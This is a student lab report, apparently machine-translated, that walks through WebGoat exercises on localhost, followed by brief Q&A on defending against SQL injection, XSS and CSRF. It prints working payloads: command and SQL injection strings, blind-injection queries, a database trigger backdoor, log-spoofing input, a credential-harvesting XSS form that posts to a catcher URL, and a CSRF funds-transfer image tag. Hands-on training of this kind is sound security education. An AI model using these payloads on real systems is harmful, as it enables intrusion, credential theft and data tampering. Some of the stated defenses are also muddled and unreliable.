"Network Warfare Technology" Exp9 Web security infrastructure Week13
First, the test objectives and content
1. Practice content
- (1) This practice target understand the basic principles of common network attack techniques, do no less than seven topics. Including (SQL, XSS, CSRF). Under Webgoat practice related experiments.
2. Some problems
- (1) SQL injection attacks principle, how to defend
A: SQL injection vulnerability refers to a security vulnerability in a Web application back-end database query processing exist. That is, the embedded SQL commands in the input string, from checking the special string may constitute an attack in the design process. After the back-end database to be regarded as a normal SQL commands executed normally possible to achieve back-end database to perform various operations, even causing serious consequences such as damage to the backend database. Means of defense: do not allow commit a string, encrypted database content contains special characters.
- (2) the principle of XSS attack, how to defend
A: anywhere to accept the normal text input site, enter Javascript script, and the script execution. Means of defense: when the form is submitted detect the presence of special character; the elimination of the site XSS vulnerabilities, web developers use the escape character security means.
- (3) the principle of CSRF attack, how to defend
A: The kind of malicious use of the site is popularly known as the phishing sites, even though it sounds like a cross-site scripting (XSS), but trust users in the use of the site XSS, CSRF through camouflage and a request from a trusted user to the use of trusted sites. Compared with XSS attacks, CSRF attacks are often not very popular (and therefore their resources to guard against is quite rare) and difficult to defend, it is considered more dangerous than XSS. For every important post submission page, you use a verification code. Each page contains a token generated by a web server, the time of filing, but also to judge the token submitted to the server, the server, if the token does not, it is determined that CSRF attacks. Regular cleaning of cookie, even without using a cookie
Second, the experimental procedures
Installation WebGoat
WebGoat is OWASP organization developed a platform for web application vulnerability experiment to illustrate the security vulnerabilities exist in the web application. WebGoat run on platforms with java virtual machine, currently provide more than 30 training courses, including: cross-site scripting attacks (XSS), access control, security thread, operating hidden field, parameter manipulation, weak session cookie , SQL blinds, digital type SQL injection, SQL injection string, web services, Open Authentication failure, dangerous HTML comment and so on. WebGoat provides a series of tutorials to learn web security, some courses are also given a video presentation, guide the user to exploit these vulnerabilities to attack.
1, in https://github.com/WebGoat/WebGoat/releases/tag/7.0.1 download
webgoat-container-7.0.1-war-exec.jar, kali put in.2, at the command line
java -jar webgoat-container-7.0.1-war-exec.jarto run Webgoat, appear to wait a little while after you run the following prompt success.
3, in the browser enter
http://localhost:8080/WebGoatinto the login interface WebGoat
4, bottom of the page using any of the account password to log in, you can see the following page:
5, the next step is to choose a variety of options on the left corresponding test.
Various injection vulnerability (Injection Flaws)
1, Command Injection (injection command)
Description: command injection is to be submitted by entering the text box of some commands that are executed after submission, so as to achieve a certain purpose.
(1) First, you can see the page there is a box, there are many options, they are legitimate
(2) we have to do is modify the source code, in which one of the options to add back some of the instructions, by selecting the revised options, click
viewachieve the desired effect.(3) Right-click the page, select
inspect ElementView page source code changes, double-click the check box in any column of the code editor, add "& pwd".(4) Select the check box, click
view, found add command is executed successfully, the attack was successful.
2, Numeric SQL Injection (numeric injection)
Description: by adding some other logical conditions to submit the text box to the next without permission to bypass the restrictions of rights, get more stuff.
(1) In the first page, we can see that this is simply a weather query, select a city in the check box, click
goafter you can see the weather of the selected city. Here, only four box options
(2) We can guess, here's database statements should find the line that corresponds to the city where the number in the database, and then output the weather.
(3) Right-click the page, select
inspect Elementthe View page source code to modify the code to find the location of the check box, double-click tovalue="102"modify, add lateror 1=1.
(4) to select the city and click
go. Discover all the city's weather information is output, of which there are two options in the no. Successful attack
3, Log Spoofing (log spoofing)
Description: After performing web attacks, they tend to leave traces of their attacks in the log file. By spoofing log, the log can be forged, conceal or eliminate their attack traces.
(1) fill in the username
zwy%0d%0aLogin Succeeded for username: admin, wherein% 0d% 0a is the ASCII carriage return and linefeed number, of any password. Click login, you can see the following information.
(2) This looks as if there is an account of the admin login page. But this is false. An attacker could exploit this way to add malicious script to a log file. For example, the user name enter
admin <script>alert(document.cookie)</script>and submit, then the administrator page will pop up a message cookies.
4、LAB: SQL Injection
Here are four steps, but Stage 2 and Stage 4 apply only to WebGoat development version
Stage 1: string injection
The goal is to bypass the login.
(1) First, try to select an administrator password
' or '1' = '1. When the entered password will find here set length limit,' or '1' = '1accounting for 13 length, while the length limits the input password box 8(2) According to the above can determine the need to modify the experience page source code.
(3) Right-click the page and select
inspect ElementView Page Source. Right-click Page and selectinspect Elementto view the page source code modification, change the password length is 13 blocks.
(4) In the Password box enter again
' or '1' = '1and found this time is not restricted. After clicking Sign prompts the following, the attack is successful
Stage 3: Numeric SQL Injection
Objective: Use Larry's identity employees view the information of the boss Neville.
(1) Use Stage 1 first, bypassing login to view the information of Larry.
(2) Right-click on the page and select
inspect ElementView Page Source, find information about the options boxLarry Stoogecode is located.(3) information that is relevant personnel to search by value in the value. In general, the boss of the highest wages, salaries are generally field
salary, so to modify the value101 or 1=1 order by salary descand clickViewProfile, find the boss to get information, the attack is successful.
5, String SQL Injection (injection string)
(1) This site can query the user's credit card number. Here relatively simple, with the above principle is similar to the digital-type implant.
(2) In the box, enter a user name
' or 1=1--, clickgo, get all the user's credit card number
6, Database Backdoors (database back door)
(1) goal: to create a database back door. Try to inject commands at the same time entering a query id of wage increases.
(2) What is the database back door? Databases often used as a back-end Web application. Further, it is also used as a storage medium. Where it can also be used as a storage malicious activity, such as triggers. A trigger is a call to another database operations on the database management system, such as CRUD. For example: An attacker can create a trigger, so that when you create a new user each new user wage increases 10000.
Effect (3) of this site is to enter a user id, returns the user the appropriate information. Enter `
101search, you can see the current salary is 55,000
(4) Enter the
101; update employee set salary=66666modified wage 66666.
(3) Enter
101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET Salary=NEW.Salary+10000 WHERE userid = NEW.useridto complete the attack.
Note: CREATE TRIGGER myBackDoor is to create a back door. BEFORE it was before ..... This statement is before inserting new data to the new employee's wage plus 10 000 and then into the database.
7, Blind Numeric SQL Injection (numeric blinds)
Description: In general, SQL injection is no clear information returned, this time of injection is called blind.
Goals: to find the value in the table cc_number pins in the pin field value 1111222233334444 field recording. pin field is int, int.
(1) The site allows you to enter an account, and detects the account is legitimate. If legitimate (there is), the prompt is valid, otherwise prompt invalid. such as:
(2) where we can use AND. As a result when the two sides AND the constant is true, it will prompt effective, otherwise prompt invalid.
(3) The next step is to test the use of database statements to find the id pin. Enter in the text box
101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 5000 ). Found to be invalid, indicating ≤5000.(4) Next, by constantly binary search, get pin for the 2364
8, Blind String SQL Injection (character blinds)
Goals: 7 and similar, but pin field here becomes varchar.
(1) Similarly, the use of AND. First, enter
101 AND (LENGTH(SELECT name FROM pins WHERE cc_number='4321432143214321') < 5)the length of the pin of the test. display
(2) to continue to try, find the length is 4.
(3) Next, an input
101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), [n], [n]) < 'H' )to the n-th letter constantly confirmed. Here trivial process is no longer listed. Finally, get a pin fieldJill
Cross-site scripting attacks (XSS)
1, Phishing with XSS (fishing using XSS)
Description: Principle: by modifying the source code of the page, allowing users to access a fake script to access, as long as the above information is entered and submitted, the input data will be sent to a specific page.
(1) Right-click the page and select
inspect ElementView Page Source. Right-click Page and selectinspect Elementto view the page source code modification, a double-click any portion inserted</form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);} </script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
(2) a search code, the following interface
(3) any input, click Submit
4, Cross Site Request Forgery (CSRF) (cross-site request forgery)
(1) Introduction: make victim to load an attack means a Web page that contains a picture of.
(2) the right and the src Parameters menu values, respectively, 294 and 900
(3) any title, enter content
<img src="http://localhost:8080/WebGoat/attack?Screen=294&menu=900&transferFunds=5000" width="1" height="1" />and submit.(4) can be seen below the emergence of a connection, you can point. Click CSRF trigger event, the attack is successful
Third, the problems encountered
- 1, after starting WebGoat and no corresponding log on the left column.
Solution: find because jdk version mismatch. Download 1.8 jdk, after setting environment variables to solve the problem. Reference https://www.jianshu.com/p/9ec7838411c8
Fourth, feelings and experiences
- Through this experiment, learning injection attack and XSS attacks, CSRF attacks, understand the principles of these attacks, a simple attempt, though not feeling very in-depth study, but a good broaden their knowledge.